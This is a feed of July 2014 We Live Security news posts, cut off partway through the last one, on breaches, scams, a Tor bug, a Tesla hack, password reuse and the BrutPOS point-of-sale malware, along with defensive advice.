We Live Security » Languages » English http://www.welivesecurity.com News, Views, and Insight from the ESET Security Community Mon, 28 Jul 2014 09:29:57 +0000 en-US hourly 1 Identity fraud: How one email wiped out $300m – and sender walked free http://www.welivesecurity.com/2014/07/28/identity-fraud-anz-email-activist/ http://www.welivesecurity.com/2014/07/28/identity-fraud-anz-email-activist/#comments Mon, 28 Jul 2014 09:29:57 +0000 Identity fraud: How one email wiped out $300m – and sender walked free http://www.welivesecurity.com/?p=48659 A single email wiped $300 million off the value of an Australian mining company, after an environmental activist, Jonathan Moylan and sent a press release to media organizations.

The post Identity fraud: How one email wiped out $300m – and sender walked free appeared first on We Live Security.

]]>
A single email wiped $300 million off the value of an Australian mining company, after an environmental activist, Jonathan Moylan, created a “corporate email” address, used identity fraud to impersonate a press officer, and sent a press release to media organizations which suggested the company faced severe financial difficulties.

The Guardian reports that the activist sent an email from the domain, “media@anzcorporate.com” and used ANZ logos to make his fiction more convincing. He also had access to a group of media outlet contacts, which he used to perpetrate his scam.

The release, which used the name of ANZ’s serving press officer, with a phone number directed to Moylan, was picked up by media outlets. During trading thereafter, $300m was wiped off the mining company’s value.

Cybercriminal gangs use similar identity fraud tactics (as reported by We Live Security here) – aiming scam emails at contacts relating to news stories,  in the name of real companies, in the hope of earning money. Moylan’s lack of financial motive was a key factor in his suspended sentence, the judge said.

This summer, a similar tactic was employed against a leaked list of people who had enquired about the auction for Bitcoins from the “dark market”. Silk Road provided a target for phishing scammers – and at least one site fell for the scam emails.

Identity fraud – a potent weapon for cybercrime

A reported 100 Bitcoins ($63,300) were stolen from Bitcoin Reserve via a fake login page which harvested email credentials, according to TechCrunch’s report.

Coindesk reports that the scam targeted individuals on a list of people who had expressed interest in the auction for Bitcoins from Silk Road. The list was leaked after a member of the U.S. Marshals service used CC instead of BCC on an email.

‘Not a criminal in the classic sense’

The Register reports that the country’s supreme court gave Moylan a suspended sentence, saying that despite the fact that “Some investors lost money,” the activist was “not a criminal in the classic sense.”

The attack came in the form of a release claiming that ANZ Bank had withdrawn a loan from the mining company, totalling $1.2bn, relating to an open-cut coaline. Moylan added that the bank was withdrawing due to “corporate responsibility,” according to The Register.

Justice Davies said, “It is clear the offender has been prepared to break the law on a number of occasions to further the causes which he believes in.”

The post Identity fraud: How one email wiped out $300m – and sender walked free appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/28/identity-fraud-anz-email-activist/feed/ 0
Sony hacked: Victims to get $15m in ‘quality’ games – some day http://www.welivesecurity.com/2014/07/28/sony-hacked-victims-offered-games/ http://www.welivesecurity.com/2014/07/28/sony-hacked-victims-offered-games/#comments Mon, 28 Jul 2014 09:14:26 +0000 Sony hacked: Victims to get $15m in ‘quality’ games – some day http://www.welivesecurity.com/?p=48651 Victims of the notorious attack against Sony’s online gaming service and associated websites in 2011, which exposed details for up to 77 million subscribers, are to be offered $15m in digital goods as compensation.

The post Sony hacked: Victims to get $15m in ‘quality’ games – some day appeared first on We Live Security.

]]>
Victims of the notorious attack against Sony’s online gaming service and associated websites in 2011, which exposed details for up to 77 million subscribers, are to be offered $15m in digital goods as compensation for the outage and exposure of data, according to Polygon.

Victims will be offered a list of PS3 and PSP games including hits such as Dead Nation, InFamous and LittleBigPlanet, or a three-month free subscription to the premium PlayStation Plus service. The Plus subscription will only be available to U.S. gamers.

The offer is still subject to approval by a judge in May 2015. “Boy won’t those games look appealing then,” commented Eurogamer referring to the vintage of the titles, none of which are very new. The site suggested that Sony’s legal letter was best enjoyed read out in the voice of crooked lawyer Saul Goodman from Breaking Bad.

Sony hacked – too little, too late?

A previous judgement by Britain’s Information Commissioner’s Office fined Sony, and said that the attack, “could have been prevented if software was up to date,” according to ZDNet’s report.

The class-action suit was brought  immediately in the wake of the hack, which exposed personally identifying details for 77 million users, at that point among the biggest breaches in history. It also took several months before Sony’s PSN service was working fully in all territories.

“A proposed settlement has been reached in the class action lawsuits arising from the April 2011 criminal cyber-attacks on the PlayStation Network, Qriocity, and Sony Online Entertainment services,” Sony told gaming site Polygon via email. “While we continue to deny the allegations in the class action lawsuits, most of which had been previously dismissed by the trial court, we decided to move forward with a settlement to avoid the costs associated with lengthy litigation.”

Sony – “We continue to deny the allegations”

Sony claims there has been no evidence of credit card fraud as a result of the attack, and offers a cash settlement to anyone who can prove they have suffered financial damage.

The games are also on offer on a first-come, first-served basis – once $6 million have been handed out, the rest of the settlement will be in the form of subscriptions.

The post Sony hacked: Victims to get $15m in ‘quality’ games – some day appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/28/sony-hacked-victims-offered-games/feed/ 0
Cloud security – fears as zombie army finds gold in heavens http://www.welivesecurity.com/2014/07/26/cloud-security/ http://www.welivesecurity.com/2014/07/26/cloud-security/#comments Sat, 26 Jul 2014 20:48:08 +0000 Cloud security – fears as zombie army finds gold in heavens http://www.welivesecurity.com/?p=48624 Using free cloud application hosting can allow an attacker to create a “free supercomputer” according to The Register's report - used to mine cryptocurrency, researcher Oscar Salazar warns.

The post Cloud security – fears as zombie army finds gold in heavens appeared first on We Live Security.

]]>
Cloud computing services are commonly used in cyberattacks, often to host a malicious payload which a victim is duped into clicking and downlading malware. But two researchers have shown that the cloud can harbour something even more alarming for cloud security – “legal zombies”, ready to rob the internet of gold.

Using free cloud application hosting can allow an attacker to create a “free supercomputer” according to The Register‘s report – used to mine cryptocurrency, researcher Oscar Salazar warns but also capable of mounting direct attacks – and he predicts cybercriminals will soon use this method, according to Tech Week Europe.

Salazar’s attack relies on application-hosting services – many of which have highly lax sign-up procedures, Wired reported. Armed with a self-made list of fake email addresses, he was able to create a host of accounts  in the cloud, despite cloud security measures.

With days the two researchers had legally created an army of  1,000 non-existent “customers” on sites offering cloud application services – and used this horde to mine cryptocurrency. At full power, the botnet earned $1,750 a week “on someone else’s electricity bill”, Ragan said.

Cloud security – undead allowed in, no questions asked

“We essentially built a supercomputer for free,” Ragan said. He, along with Salazar works as a researcher for the security consultancy Bishop Fox. “We’re definitely going to see more malicious activity coming out of these services.”

Salazar and Ragar declined to reveal which of the 150 companies they tested allowed them entry – to prevent hackers following in their footsteps – but said that in some cases, the mining process was allowed to continue for weeks.

“What happens when computer criminals start using friendly cloud services for malicious activities? In this presentation, we explore how to (ab)use free trials to get access to vast amounts of computing power, storage, and pre-made hacking environments. Oh! Also, we violate the hell out of some terms of service.”

No CAPTCHAS, no questions – is this cloud security?

“A lot of these companies are startups trying to get as many users as quickly as possible,” says Salazar. “They’re not really thinking about defending against these kinds of attacks.”

Worryingly, some of these companies use cloud services resold from Amazon – which may make mitigating certain forms of cyberattack more difficult.

“Imagine a distributed denial-of-service attack where the incoming IP addresses are all from Google and Amazon,” Ragan said. “That becomes a challenge. You can’t blacklist that whole IP range.”

The Register reports that the researchers admit that the technique ‘violates’ a lot of terms-of-service – and hence, the bots were cullled mercilessly after the experiment.

The post Cloud security – fears as zombie army finds gold in heavens appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/26/cloud-security/feed/ 0
Data breach – European bank’s info “held to ransom” http://www.welivesecurity.com/2014/07/25/data-breach-european-banks-info-held-ransom/ http://www.welivesecurity.com/2014/07/25/data-breach-european-banks-info-held-ransom/#comments Fri, 25 Jul 2014 15:53:07 +0000 Data breach – European bank’s info “held to ransom” http://www.welivesecurity.com/?p=48586 The European Central Bank has revealed that information including email addresses and contact data has leaked in a data breach - and that the unknown attackers demanded “financial compensation” from the bank in return for not releasing the information, according to the BBC’s report.

The post Data breach – European bank’s info “held to ransom” appeared first on We Live Security.

]]>
The European Central Bank has revealed that information including email addresses and contact data has leaked in a data breach – and that the unknown attackers demanded “financial compensation” from the bank in return for not releasing the information.

The BBC reports that records for 20,000 people leaked in the breach, which affected a database serving its website. The ECB released a statement pointing out that the database was separate from internal systems, and that “no market-sensitive data was compromised.”

“The theft came to light after an anonymous email was sent to the ECB seeking financial compensation for the data,” the bank said. The data came from people who had applied to attend ECB events via the site, and those affected have been notified.

The use of data theft as a tool for extortion is a potent weapon for cybercriminals. In some cases, blackmailers have carried out threats – and put companies out of business.

Veteran security researcher and We Live Security writer Graham Cluley says, “In the last few weeks there have been numerous stories of online criminals launching attacks against businesses with the aim of extorting money from their victims.”

Data breach – are you affected by bank leak?

As an extra precaution, all passwords on the site have been reset. Police in Germany have been informed and are investigating.

Silicon Republic reports that it is believed that the European Regular did not pay the (undisclosed) ransom.

The site reports that the attack follows a pattern of similar moves against poorly protected databases at international financial institutions, and DDoS attacks directed against bank sites.

New era of data breach extortion

It has also been revealed that mobile phone giant Nokia had, a few years back, found itself in the uncomfortable position of handing over millions of dollars to blackmailing hackers who had stolen encryption codes for the Symbian operating system, and were threatening to post them online.

Data breaches can cause a loss of confidence among consumers, and cause lasting damage not only to a brand, but to profit. Marketing Week reports that Target – the subject of a large-scale data breach affecting millions of Americans – saw profits down 46% year-on-year in the last quarter. The breach led to the departure of the company’s CEO and CIO, and a restructuring of the company’s command structure.

“While most of the data were encrypted, parts of the database included email addresses, some street addresses and phone numbers that were not encrypted,” the ECB said.  The affected database, “is physically separate from any internal ECB systems,” the bank said.

The post Data breach – European bank’s info “held to ransom” appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/25/data-breach-european-banks-info-held-ransom/feed/ 0
How to avoid tech support scams http://www.welivesecurity.com/videos/avoid-tech-support-scams/ http://www.welivesecurity.com/videos/avoid-tech-support-scams/#comments Fri, 25 Jul 2014 14:53:03 +0000 How to avoid tech support scams http://www.welivesecurity.com/?post_type=post_video&p=48580 Tech support scams come in many different forms and can be hard to detect. Following these simple steps fromWe Live Security will help you recognise and avoid them.

The post How to avoid tech support scams appeared first on We Live Security.

]]>
Tech support scams come in many different forms and can be hard to detect. Following these simple steps from We Live Security will help you recognise and avoid them.

The post How to avoid tech support scams appeared first on We Live Security.

]]>
http://www.welivesecurity.com/videos/avoid-tech-support-scams/feed/ 0
How to get rid of posts and photos you hate on Facebook http://www.welivesecurity.com/videos/get-rid-posts-photos-hate-facebook/ http://www.welivesecurity.com/videos/get-rid-posts-photos-hate-facebook/#comments Thu, 24 Jul 2014 15:09:20 +0000 How to get rid of posts and photos you hate on Facebook http://www.welivesecurity.com/?post_type=post_video&p=48547 Almost everyone now has a Facebook account where posts and photos are frequently shared. However keeping track of what is posted can sometimes be a problem. Follow these 5 simple tips to get rid of content you no longer wish to share.

The post How to get rid of posts and photos you hate on Facebook appeared first on We Live Security.

]]>
Almost everyone now has a Facebook account where posts and photos are frequently shared. However keeping track of what is posted can sometimes be a problem. Follow these 5 simple tips to get rid of content you no longer wish to share. 

The post How to get rid of posts and photos you hate on Facebook appeared first on We Live Security.

]]>
http://www.welivesecurity.com/videos/get-rid-posts-photos-hate-facebook/feed/ 0
Accounts hacked: Stubhub $1m cyber fraud ticket scam busted http://www.welivesecurity.com/2014/07/24/accounts-hacked/ http://www.welivesecurity.com/2014/07/24/accounts-hacked/#comments Thu, 24 Jul 2014 14:57:36 +0000 Accounts hacked: Stubhub $1m cyber fraud ticket scam busted http://www.welivesecurity.com/?p=48505 Ebay’s online ticket resale service Stubhub fell victim to a cyber-scam where a “global gang” used 1,600 hacked accounts on the service and bought and resold tickets, laundering $1m through European banks.

The post Accounts hacked: Stubhub $1m cyber fraud ticket scam busted appeared first on We Live Security.

]]>
Ebay’s online ticket resale service Stubhub fell victim to a cyber-scam where a “global gang” used 1,600 hacked accounts on the service and bought and resold tickets, laundering the profits through European banks – earning a total of $1m.

Three criminals behind the spate of Stubhub accounts hacked were arrested in New York, and a further three in London, according to the BBC’s report.

The scams were complex, involving data from other corporate breaches (such as email addresses and passwords) which were then used to breach legitimate Stubhub accounts – eBay emphasised that its servers had not been accessed, after a high-profile attack earlier this year reportedly exposed customer data.

Accounts hacked – ‘no data breach’

The criminals – described by New York County’s district attorney as a “global cybercrime ring” also used malware to obtain Stubhub logins.

Stubhub’s global head of communications, Glenn Lehrman, said in an interview with Reuters that victims have been reimbursed, and that the firm has been working with law enforcement around the world for more than a year.

Lehrman said, via Sky News’ report, “We did not have anyone who hacked into our system” and described a “pretty intense network of cyber fraudsters working in concert with one another.”

“The arrests today relate to fraudulent transactions that were detected on existing Stubhub customer accounts in 2013,” said spokesman Glenn Lehrman.

Passwords from previous data breaches

“These legitimate customer accounts were accessed by cybercriminals who had obtained the customers’ login and password either through data breaches of other websites and retailers, or through the use of key-loggers and/or other malware on the customer’s own PC.

“Once fraudulent transactions were detected on a given account, customers were immediately contacted by Stubhub’s trust and safety team, who refunded any unauthorised transactions.”

Money was laundered through UK bank accounts from the hacked Stubhub accounts, Lehrman said, according to SC Magazine’s report.

The use of credentials stolen in data breaches highlights the importance of changing details if you suspect your password and username may have leaked in such an attack. AN ESET guide to what to do in this event can be found here.

The post Accounts hacked: Stubhub $1m cyber fraud ticket scam busted appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/24/accounts-hacked/feed/ 0
Online privacy fears as Tor rushes to fix “uncloaking” bug http://www.welivesecurity.com/2014/07/24/online-privacy-2/ http://www.welivesecurity.com/2014/07/24/online-privacy-2/#comments Thu, 24 Jul 2014 14:44:32 +0000 Online privacy fears as Tor rushes to fix “uncloaking” bug http://www.welivesecurity.com/?p=48496 The developers of the Tor online privacy service are fixing a weakness which could have exposed the identities of hundreds of thousands of users of sites around the world.

The post Online privacy fears as Tor rushes to fix “uncloaking” bug appeared first on We Live Security.

]]>
The developers of the Tor online privacy service are fixing a weakness which could have exposed the identities of hundreds of thousands of users of sites around the world – potentially putting lives at risk, as political activists in oppressive regime rely on the online privacy service to make communications hard to trace.

The hack was due to be exposed at the Black Hat security conference in Las Vegas – but the talk was abruptly cancelled due to legal concerns.

The talk, entitled “You Don’t Have to be the NSA to Break Tor” aimed to showcase a technique which could “uncloak” users of the anonymizing web service for less than $3,000 .

The details of the method have not been disclosed, and the Tor Project has moved rapidly to fix the bug.

Online privacy – Tor users fear ‘uncloaking’

Black Hat said via a post on its official website, “One of our selected talks, ‘You Don’t Have to be the NSA to Break Tor: Deanonymizing Users on a Budget’ by CERT/Carnegie Mellon researcher Alexander Volynkin was scheduled for a Briefing at Black Hat USA this August in Las Vegas.”

“Late last week, we were informed by the legal counsel for the Software Engineering Institute (SEI) and Carnegie Mellon University that: “Unfortunately, Mr. Volynkin will not be able to speak at the conference since the materials that he would be speaking about have not yet approved by CMU/SEI for public release.” As a result, we have removed the Briefing from our schedule.”

‘Questions’ for researchers behind hack

The Tor Project said that it had not forced the cancellation of the talk – but that it had “some questions” for the researchers.

Roger Dingledine said via a post on the Tor forums that, “I think I have a handle on what they did,” reassuring users that a fix for the bug was imminent.

Using the free Tor browser, you can access special .onion sites – only accessible using the browser – which are used by political activists worldwide to post information untraceably.

Other Tor sites openly host highly illegal content including pirated IP, drug markets, child pornography and sites where credit card details are bought and sold.

Tor Project leader Roger Dingledine said, “Based on our current plans, we’ll be putting out a fix that relays can apply that should close the particular bug they found. The bug is a nicebug, but it isn’t the end of the world. And of course these things arenever as simple as “close that one bug and you’re 100% safe”.

The post Online privacy fears as Tor rushes to fix “uncloaking” bug appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/24/online-privacy-2/feed/ 0
World of Warcraft account hacked – should thieves face jail? http://www.welivesecurity.com/2014/07/24/world-of-warcraft-account-hacked/ http://www.welivesecurity.com/2014/07/24/world-of-warcraft-account-hacked/#comments Thu, 24 Jul 2014 14:40:24 +0000 World of Warcraft account hacked – should thieves face jail? http://www.welivesecurity.com/?p=48484 Account hackers and thieves who loot magic weapons, armor and hard-won game currency from players in massively multiplayer titles such as World of Warcraft should face the same sentences as real-world thieves, a politician has suggested.

The post World of Warcraft account hacked – should thieves face jail? appeared first on We Live Security.

]]>
Account hackers and thieves who loot magic weapons, armor and hard-won game currency from players in massively multiplayer titles such as World of Warcraft should face the same sentences as real-world thieves, a politician has suggested.

The British Member of Parliament Mike Weatherley, chief advisor to Prime Minister David Cameron on intellectual property, suggests that crimes involving virtual items with real-world monetary value should be treated in the same way as offline thefts, according to a report in The Independent.

Gamers who steal virtual items in online games such as cases where a World of Warcraft account hacked should receive the same sentences as ‘real-life’ thieves, the MP suggested, according to an interview with radio station NewsTalk.

World of Warcraft account hacked?

Weatherley is a player of the popular fantasy game – which is a constant target for cyber criminals due to its large player base and the correspondingly high value of in-game items. Situations where gamers find their World of Warcraft hacked are common, and cyberciminals even launder money via in-game auctions.

Speaking to Buzzfeed, the MP said that authorities should not waste time over small-scale thefts.

“It’s a scale thing as well,” he said. “If you’re a genuine hacker, so to speak, and you’ve stolen the money out of thousands of accounts, then I think that’s a general theft problem that needs to be addressed very seriously.”

Such items are commonly stolen by hackers targeting player accounts – either with malware or phishing attacks. Once an account is compromised, criminals sell items for game currency, which can be exchanged for real money on various specialist sites.

A We Live Security guide to common scams which can lead to account theft in online games outlines some of the risks online gamers face.

Most online games include mechanisms to prevent direct theft – but crimes perpetrated via malware or phishing are often punished by game companies, rather than law enforcement, via penalties such as bans, account suspenson or the deletion of large amounts of game currency.

“If you’ve spent £500 on building up your armed forces and someone takes them away online, I guess you can feel hard done-by and you want your £500 back,” Weatherley said. “People shouldn’t be doing it.”

“The perception from some people is if you steal online it’s less of a crime than if you steal physically. If it genuinely is someone who’s paid in the game and they’ve had that stolen, that’s probably no different to something in the physical world.”

Mike Penning, the Minister of State for Justice responded that sentencing in such cases was “a matter for the courts.”

The post World of Warcraft account hacked – should thieves face jail? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/24/world-of-warcraft-account-hacked/feed/ 0
Tesla Model S hacked to open doors while in motion http://www.welivesecurity.com/2014/07/23/tesla-model-s-hacked-open-doors-motion/ http://www.welivesecurity.com/2014/07/23/tesla-model-s-hacked-open-doors-motion/#comments Wed, 23 Jul 2014 14:22:42 +0000 Tesla Model S hacked to open doors while in motion http://www.welivesecurity.com/?p=48409 Tesla’s Model S has been hacked to make the doors and sun roof open while the car is in motion - and the researchers behind the attack were able to control the systems remotely.

The post Tesla Model S hacked to open doors while in motion appeared first on We Live Security.

]]>
Tesla’s Model S has been hacked to make the doors and sun roof open while the car is in motion – and the researchers behind the attack were also able to switch on the headlights and sound the horn by remote control, according to Ubergizmo‘s report.

The hack, performed by Zhejiang University students as part of a competition, exploited an unspecified flaw in the flow design of the car to gain control of systems including the door locks, windscreen wipers and lighting via the car’s central control system.

Tesla did not officially support the competition, but welcomed the publication of the exploit and said it would investigate. While security researchers have previously demonstrated successful attacks against various models of ‘connected’ vehicles, wireless attacks which work while the vehicle is in motion are rare.

Tesla Model S – hacker target

The car – a high-profile ‘flagship’ for the electric sportscar market – has been the focus of much security research, due to its integration of computer components (the dashboard includes a connected touch panel), and reliance on apps for functions such as opening the doors. This week’s hack is the first to compromise multiple systems remotely – although the researchers have not as yet revealed their methodology.

The team won a reported prize of $10,000 for the hack, offered as part of the annual Syscan conference in Beijing according to The Register‘s report.

Teams were challenged to compromise the 17-inch touch panel which forms the centrepiece of the Model S’s dashboard, according to Autoblog’s report. The hack had to be carried out remotely, according to the rules of the contest. The car maintains a connection to the internet via syncing with the driver’s mobile device.

In a statement, the electric car company said that it was in favour of “the idea of providing an environment in which responsible security researchers can help identify potential vulnerabilities.”

This week’s hack follows previous exploits which could allow potential attackers to bypass locking systems on the car’s paired app.

Earlier this year, security questions were raised over the app-based “key” used to unlock the electric supercar Tesla – after a researcher showed it was possible to guess the key’s six-digit PIN by brute force. The Tesla car is “locked” using an iPhone app, accesssed via a basic six-character password, according to Sky News.

Tesla Model S – dawn of ‘cyberjacking’?

As wireless technologies and electronic controls are increasingly built into cars, vehicles could become vulnerable to hackers – either stealing information, or injecting malware, a U.S. Senator warned in a letter to 20 major auto manufacturers last year.

Senator Edward J Markey, Democrat, Massachussets, pointed out in his publicly available letter that average cars now have up to 50 electronic control units, often controlled by a car “network”.

The open letter has ignited a spate of commentary, with Market Oracle describing the crime as “cyberjacking”, and pointing out that the average family car contains 100 million lines of computer code, and that software can account for up to 40% of the cost of the vehicle, according to researchers at the University of Wisconsin-Madison.

Hacks against cars have been demonstrated before – but thus far, have relied on attackers having physical access to the vehicles. At the DefCon conference in 2013, two researchers showed how they could seize control of two car models from Toyota and Ford by plugging a laptop into a port usually used for diagnostics, as reported by We Live Security here.

This week’s hack against Tesla’s flagship could mark a new stage in “cyberjacking” – where attackers could compromise a vehicle remotely, without first accessing the car’s hardware.

The post Tesla Model S hacked to open doors while in motion appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/23/tesla-model-s-hacked-open-doors-motion/feed/ 0
Shaggy Dogma: Passwords and Social Over-Engineering http://www.welivesecurity.com/2014/07/23/shaggy-dogma-passwords-social-engineering/ http://www.welivesecurity.com/2014/07/23/shaggy-dogma-passwords-social-engineering/#comments Wed, 23 Jul 2014 05:00:53 +0000 Shaggy Dogma: Passwords and Social Over-Engineering http://www.welivesecurity.com/?p=48402 Given the 'nightmare' that is password management, is Microsoft right to say that it's sometimes OK to re-use the same memorable password on several sites?

The post Shaggy Dogma: Passwords and Social Over-Engineering appeared first on We Live Security.

]]>
Recently I presented at the CFET (Cybercrime Forensics Education & Training) conference in Canterbury, in the UK, on password and PIN selection strategies, an ongoing research interest. To be more precise, on this occasion I was talking about revaluating the way we educate computer users about good password/passphrase/passcode selection practice. (I’m afraid there wasn’t a paper to go with the presentation, but there’s a very PIN-oriented paper I presented at EICAR a couple of years ago here: PIN Holes: Passcode Selection Strategies.) (I’ll probably return to the whole education and strategy issue on the ESET blog in the near future, but right now I want to look at a very specific issue.)

Hardly had I left Canterbury before my attention was directed to a paper by Dinei Florêncio and Cormac Herley of Microsoft Research and Paul C. van Oorschot of Carleton University, Ottawa, which, according to The Register ‘shot holes through the security dogma’: namely, a paper called Password portfolios and the Finite-Effort User: Sustainably Managing Large Numbers of Accounts.

So what was this shaggy dogma story? Well, let’s go back to an extract from that presentation.

Fernando Corbato, the MIT computer scientist who is widely credited with pioneering the use of the password as a means of logging into a computer, says passwords have now become “kind of a nightmare.” Some might call that payback…

Corbato said in an interview with Wall Street Journal’s Digits Blog that he himself had around 150 passwords, and now committed security sins such as writing down a “crib sheet” to remember them all. Presumably written on the world’s biggest Post-IT, stuck onto a very large monitor.

Security researchers usually suggest that you use the strongest possible password, change it frequently (and certainly if there’s any possibility of a compromise), and don’t ever re-use the same password between two or more services. Even if you have fewer than 150 passworded accounts to maintain, it’s likely that you have a lot of strong passwords to generate, and remember, and you probably have to change at least some of them fairly regularly. But this ‘dogma’ is by no means irrational, even though there are scenarios (some of them all too common, like a server breach when the service provider drops the ball and an attacker gets access to a large credentials database) where your password is less safe than you might think or hope. Nevertheless, strong passwords/passphrases do, in the most favourable circumstances, represent a significant obstacle to easy compromise by an attacker. So is there a less onerous alternative? Well, yes and no. Password management software, for instance. But Florêncio, Herley and van Oorschot are suggesting something that sounds at first a little more radical.

They have presented a dense and detailed paper, well worth reading if you’re interested in the minutiae of authentication (and covers more issues than I’ve mentioned here). Indeed, if it had been available when I compiled my presentation, I’d certainly have made reference to it. But for the everyday user, it offers one simple and possibly useful idea, based on the assumption that some authenticated services are more important (or carry more risk) than others. Indeed, I don’t know about you, but I often find myself having to generate a username/password pair for a service I may never use again, and where authentication may actually be overkill in any case. At least from my point of view: however (for instance), a publisher might want to track who accesses a particular document by requiring each person to create an account. (And in fact that’s a common enough scenario for a professional researcher.)

The paper concludes:

We have explored the task of managing a portfolio of passwords. A starting point for our analysis was the critical observation that to be realistic, efficient password management should consider a realistic suite of attacks and minimize the sum of expected loss and user effort…

… optimal grouping will put high-value accounts in smaller (or singleton) groups, and low-value accounts in larger groups.

They don’t say, as you might think from some reports, that strong passwords and non-reuse of passwords across accounts are always overkill. They do, however, seem to suggest that grouping accounts according to value (think in terms not only of value to you, but to a potential attacker) means that some accounts don’t require the same degree of authentication as others. For instance, you might have a standard memorable password that you might use across less important services. And in fact, I suspect that this isn’t an uncommon strategy. It isn’t one that finds its way into security gurus’ recommendations, however. Perhaps because it’s not always easy to define what constitutes low-value to an attacker (let alone an end user), and therefore to provide hard and fast rules about how to assign sites/credentials to groups. The abstract does offer:

… an optimal password re-use strategy in the following sense: for a fixed number of passwords, and a given set of accounts (thus effort is fixed), find how to group accounts to minimize total expected loss.

Sadly, that solution is presented in abstract terms that probably do not help much if you’re wondering whether to generate a password with optimal entropy for a given site, especially if you don’t know what password entropy actually is. (Simplistically, it’s a way of measuring how easy to predict a password is: in this sense, predictability might imply susceptibility to a variety of attacks – it’s more complex than a simple measure of randomness.)

This is not a trivial issue: if you’re prepared to accept that low value is the same as low risk and you don’t care whether your credentials for service n are compromised – even if that means that your credentials for x, y and z may also be compromised because they use the same password – you’d better be sure that

  1. those really are low-value, low-risk services
  2. there aren’t any high-value, high-risk services that might be at risk of secondary compromise. (For instance, when knowing your shared password might make it easier for an attacker to guess the high value service password even though you don’t use the identical password on the high value service.)

For a security specialist, it’s easier to suggest that – despite the inconvenience – you treat every service as high value (i.e. advise never to share), rather than try to define exactly how to group the passworded services you use and provide a lengthy explanation that covers all the edge cases with no possibility of misinterpretation. I can certainly envisage scenarios where services may be regarded as low risk and low value but the shared password might offer a clue as to what strategy was used by the same user on a higher value service.

Unfortunately, over-engineering is one of the ongoing problems with security education generally. And one of the reasons for that is that – as always – you can’t rely on every end user to interpret everything you say correctly, even if you express it as you intended.

David Harley
ESET Senior Research Fellow

The post Shaggy Dogma: Passwords and Social Over-Engineering appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/23/shaggy-dogma-passwords-social-engineering/feed/ 0
Is your Point of Sale machine protected against attacks? http://www.welivesecurity.com/2014/07/22/point-sale-machine-protected-attacks/ http://www.welivesecurity.com/2014/07/22/point-sale-machine-protected-attacks/#comments Tue, 22 Jul 2014 21:07:10 +0000 Is your Point of Sale machine protected against attacks? http://www.welivesecurity.com/?p=48400 Criminals are very interested in retailers’ Point of Sale (PoS) machines. Recently, a new type of malware has been found that specifically tries to break into PoS machines, called Win32/BrutPOS.A.

The post Is your Point of Sale machine protected against attacks? appeared first on We Live Security.

]]>
In case the coverage of last year’s Target breach did not drive this point home: Criminals are very interested in retailers’ Point of Sale (PoS) machines. Because so many credit card numbers pass through these systems, and they are often insufficiently guarded, criminals find them a very low-hanging fruit for theft. Recently, a new type of malware has been found that specifically tries to break into PoS machines. ESET detects this threat as Win32/BrutPOS.A.

The idea behind BrutPOS is that it tries to brute-force its way into PoS machines by trying a variety of (overused) passwords in order to log in via Remote Desktop Protocol (RDP). It is unclear at this time how this malware is being spread, but it is likely just one component of an attacker’s toolkit – that is to say, it is probably being used in concert with other malware, possibly depending on the defenses (or lack thereof) on the machines being attacked. Once the machine has been breached, the trojan installs a “RAM Scraper” which collects credit card numbers from the memory of the PoS machine and sends them back to the attackers via FTP. Many of the systems on which this malware has been found belong to small businesses, which are particularly desirable targets for such theft.

If you have a PoS machine, there are a few quick things you can do to help protect these systems from this particular type of attack:

  • Use a strong password
    Much has been written on the importance (and tactics) of choosing a strong password, and yet here we have malware that is successfully breaching machines because they have such poor passwords. It is important to note that in this case, many of the passwords used on the breached machines were the default passwords or were simple variations on the name of the PoS vendor. For instance: the top three most common passwords were “aloha12345”, “micros” and “pos12345”. It is best to use a passphrase rather than a simple password, as a passphrase can be easy to remember yet very time-consuming to crack due to its length.
  • Limit login attempts
    Once you have a strong password in place, make it count: Limit attempts to log in to machines to just a few. Locking people out after 3-5 incorrect attempts is a common range. This will dramatically decrease the effectiveness of brute forcing attacks, as the attackers will be prevented from trying large numbers of incorrect passwords until they get to the right one.
  • Limit access
    We talk a lot here about the Principle of Least Privilege and the dangers of enabling RDP. This is far from being the first malware to take advantage of poor passwords or of the power of RDP. The long and short of it is, limit access wherever you can. For instance: If you do not need to remotely access the machine, do not enable RDP. If you do need to enable RDP, make sure you do so securely. This article from University of California Berkeley has some great tips to help. Likewise, limiting FTP access may hamper attackers’ ability to exfiltrate credit card data.

There are a variety of other things you can do to help protect your PoS machines, which are much the same measures as you would take to protect any other machine on the Internet; including regularly updating software and using security software. This post by the US-CERT goes into more details, specific to administering PoS systems.

This is a good reminder that any machine that connects to the Internet can and should be protected, and that the techniques for doing so are basically the same, regardless of operating system. Once you learn good security hygiene, you can use the same basic principles on any system you administer.

 

 

The post Is your Point of Sale machine protected against attacks? appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/22/point-sale-machine-protected-attacks/feed/ 0
Wi-Fi security – the new ‘bulletproof’ router (and how to toughen yours) http://www.welivesecurity.com/2014/07/22/wi-fi-security-2/ http://www.welivesecurity.com/2014/07/22/wi-fi-security-2/#comments Tue, 22 Jul 2014 16:45:36 +0000 Wi-Fi security – the new ‘bulletproof’ router (and how to toughen yours) http://www.welivesecurity.com/?p=48369 A new project aims to protect homes and small businesses from the security failings of Wi-Fi routers, a problem which has repeatedly hit the headlines over the past year.

The post Wi-Fi security – the new ‘bulletproof’ router (and how to toughen yours) appeared first on We Live Security.

]]>
A new project aims to protect homes and small businesses from the security failings of Wi-Fi routers, a problem which has repeatedly hit the headlines over the past year as security researchers and law enforcement warn of the Wi-Fi security problems posed by the devices – and by shared Wi-Fi networks in general.

The Open Wireless Router project, launched by the Electronic Frontier Foundation, aims to develop software which offers a higher level of Wi-Fi security than current router models - and also offer a safe way for users to share their networks with guests.

The firmware is not ready for use by home users, the EFF warns, and is aimed at “people prepared to deal with the bleeding edge.”

Wi-Fi security – a new solution?

The Inquirer reports that the organization has released source code for a secure, open router firmware, running on a popular Netgear model – and asked for help from the hacker and security researcher community.

“The software aims to do several things that existing routers don’t do well—or don’t do at all,” the organization says.

“Allow small business and home users to easily enable an open network, so guests and passers-by can get an Internet connection if they need one, while keeping a password-locked WPA2 network for themselves and their friends or coworkers.”

